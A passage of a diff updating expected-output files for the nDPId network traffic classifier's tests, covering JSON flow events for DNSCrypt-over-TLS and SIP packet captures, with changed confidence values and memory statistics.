-00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} -00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} -00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"3":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00867{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1491813286392,"flow_last_seen":1491813286491,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1491813286491,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286393,"flow_last_seen":1491813286573,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286573,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":59,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286393,"flow_last_seen":1491813286577,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286577,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":67,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286275,"flow_last_seen":1491813286586,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286586,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":76,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286275,"flow_last_seen":1491813286594,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286594,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00924{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":81,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1491813286392,"flow_last_seen":1491813286609,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":1520,"flow_avg_l4_payload_len":253,"midstream":0,"thread_ts_msec":1491813286609,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01264{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":87,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1491813286392,"flow_last_seen":1491813286612,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":6760,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1491813286612,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"simplednscrypt.org","server_names":"simplednscrypt.org,www.simplednscrypt.org","ja3":"83e04bc58d402f9633983cbf22724b02","ja3s":"76cc3e2d3028143b23ec18e27dbd7ca9","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=simplednscrypt.org","alpn":"h2,http\/1.1","fingerprint":"3E:20:0F:BF:AD:D8:5C:A1:A1:1B:E5:B2:A7:D4:68:E2:6A:DB:01:41"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":39,"flow_first_seen":1491813284555,"flow_last_seen":1491813285262,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":14238,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50233,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286275,"flow_last_seen":1491813286718,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50253,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1491813286392,"flow_last_seen":1491813286753,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":7519,"flow_avg_l4_payload_len":417,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50258,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} +00704{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":36,"flow_first_seen":1491813286393,"flow_last_seen":1491813286913,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1310,"flow_tot_l4_payload_len":9310,"flow_avg_l4_payload_len":258,"midstream":0,"thread_ts_msec":1491813286913,"l3_proto":"ip4","src_ip":"192.168.43.167","dst_ip":"134.119.26.24","src_port":50259,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"5":"DPI (cache)"},"proto":"TLS.DNScrypt","breed":"Safe","category":"Network"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":111,"source":"simple-dnscrypt.pcap","alias":"nDPId-test","packets-captured":111,"packets-processed":111,"total-skipped-flows":0,"total-l4-payload-len":38586,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":8,"total-updates":0,"current-active-flows":0,"total-active-flows":4,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":35,"global_ts_msec":1491813286913} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 111/111 @@ -41,9 +41,9 @@ ~~ total active/idle flows...: 4/4 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5965290 bytes -~~ total memory freed........: 5965290 bytes -~~ total allocations/frees...: 118279/118279 +~~ total memory allocated....: 6098924 bytes +~~ total memory freed........: 6098924 bytes +~~ total allocations/frees...: 121041/121041 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 462 chars ~~ json string max len.......: 1269 chars diff --git a/test/results/sip.pcap.out b/test/results/sip.pcap.out index b68577571..9768b0dd9 100644 --- a/test/results/sip.pcap.out +++ b/test/results/sip.pcap.out @@ -2,35 +2,35 @@ 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1120469572844} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01054{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1120469572844,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469572844,"pkt":"ADBUADRWAODtAW69CABFAAHvaZgAAIARF6bAqAEC1PIhIxPEE8QB2272UkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMTUxMjQ4NzM3LTQ2ZWE3MTVlMTkyLjE2OC4xLjI7cnBvcnQNCkZyb206IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTkwM2RmMGENClRvOiA8c2lwOnZvaTE4MDYzQHNpcC5jeWJlcmNpdHkuZGs+DQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2M0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9OWM3ZDJkYmQ4ODIyMDEzYz47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDY4IFJFR0lTVEVSDQpDb250ZW50LUxlbmd0aDogMA0KTWF4LUZvcndhcmRzOiA3MA0KVXNlci1BZ2VudDogTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuMC41MS4xNg0KDQo="} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469572844,"flow_last_seen":1120469572844,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469572844,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 01078{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"sip.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1120469572981,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":528,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":528,"pkt_l4_len":494,"thread_ts_msec":1120469572981,"pkt":"AODtAW69ADBUADRWCABFAAICAABAADcRiivU8iEjwKgBAhPEE8QB7tD8U0lQLzIuMCA0MDEgVW5hdXRob3JpemVkDQpDYWxsLUlEOiA1NzgyMjI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDU2VxOiA2OCBSRUdJU1RFUg0KRnJvbTogPHNpcDp2b2kxODA2M0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9OTAzZGYwYQ0KVG86IDxzaXA6dm9pMTgwNjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTAwLTA0MDkyLTE3MDFhZjYyLTEyMGM2NzE3Mg0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjtyZWNlaXZlZD04MC4yMzAuMjE5LjcwO3Jwb3J0PTUwNjA7YnJhbmNoPXo5aEc0YktucDE1MTI0ODczNy00NmVhNzE1ZTE5Mi4xNjguMS4yDQpXV1ctQXV0aGVudGljYXRlOiBEaWdlc3QgcmVhbG09InNpcC5jeWJlcmNpdHkuZGsiLG5vbmNlPSIxNzAxYWY1NjZiZTE4MjA3MDA4NGM2Zjc0MDcwNmJiIixvcGFxdWU9IjE3MDFhMTM1MWY3MDc5NSIsc3RhbGU9ZmFsc2UsYWxnb3JpdGhtPU1ENQ0KQ29udGVudC1MZW5ndGg6IDANCg0K"} 